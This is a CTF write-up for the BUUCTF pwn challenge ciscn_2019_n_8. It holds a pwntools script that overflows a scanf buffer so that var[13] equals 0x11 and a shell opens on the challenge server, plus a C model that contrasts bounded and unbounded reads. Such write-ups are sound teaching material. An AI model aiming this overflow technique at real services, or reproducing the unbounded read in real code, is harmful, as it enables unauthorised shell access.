buuctf pwn ciscn_2019_n_8
2022-06-21 22:22:00 【[mzq]】
ciscn_2019_n_8

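Check the binary's basic information with checksec.

Load the program into 32-bit IDA for analysis. scanf reads a string into var, and the v4 and v5 that follow have no effect. The program then checks whether var[13] equals \x11, and if it does, it gives a shell.
So all we need is for our input to put \x11 at var[13], that is, right after 13 four-byte elements of padding.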
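```python
from pwn import *

# Set the context first so flat() packs integers as 32-bit little-endian
context(log_level="debug", arch="i386")

# io = process("./ciscn_2019_n_8")       # local testing
io = remote("node4.buuoj.cn", 29622)     # remote target

# On 32-bit each element is 4 bytes, so 4 a's per element:
# 13 elements of padding, then 0x11 lands in var[13]
payload = flat([b"aaaa" * 13, 0x11])
io.sendline(payload)
io.interactive()
```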
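The check described above, modelled in C with a width-limited read beside it, so the effect of bounding the `%s` conversion is visible. This is an added example, not the challenge's source or the author's code; the 15-word buffer size, the function names and the sample input are assumptions made for the model.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WORDS 15        /* assumed size of the model buffer, in 32-bit words */
#define CHECK_INDEX 13  /* from the page: var[13] is compared with 0x11 */
#define MAGIC 0x11u

/* Decode word idx of the byte buffer as little-endian (i386 layout). */
static uint32_t word_at(const unsigned char *buf, size_t idx) {
    const unsigned char *p = buf + idx * 4;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Weak form: the string may span the whole object, including word 13.
 * The width 59 only keeps this model inside its own 60 bytes. */
int check_unbounded(const char *input) {
    unsigned char var[WORDS * 4] = {0};
    sscanf(input, "%59s", (char *)var);
    return word_at(var, CHECK_INDEX) == MAGIC;
}

/* Hardened form: 51 characters plus the NUL end at byte 51, so input
 * can never reach byte 52, where word 13 starts. */
int check_bounded(const char *input) {
    unsigned char var[WORDS * 4] = {0};
    sscanf(input, "%51s", (char *)var);
    return word_at(var, CHECK_INDEX) == MAGIC;
}

/* Constructed sample input: 13 words of padding, then the byte 0x11. */
const char *sample_input(void) {
    static char in[CHECK_INDEX * 4 + 2];
    memset(in, 'a', CHECK_INDEX * 4);
    in[CHECK_INDEX * 4] = 0x11;
    in[CHECK_INDEX * 4 + 1] = '\0';
    return in;
}

int main(void) {
    printf("unbounded read: check %s\n",
           check_unbounded(sample_input()) ? "passes" : "fails");
    printf("bounded read:   check %s\n",
           check_bounded(sample_input()) ? "passes" : "fails");
    return 0;
}
```

The more robust fix is to keep any value that gates a privileged action out of the object that user input is read into; the width limit only stops the string from reaching it.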
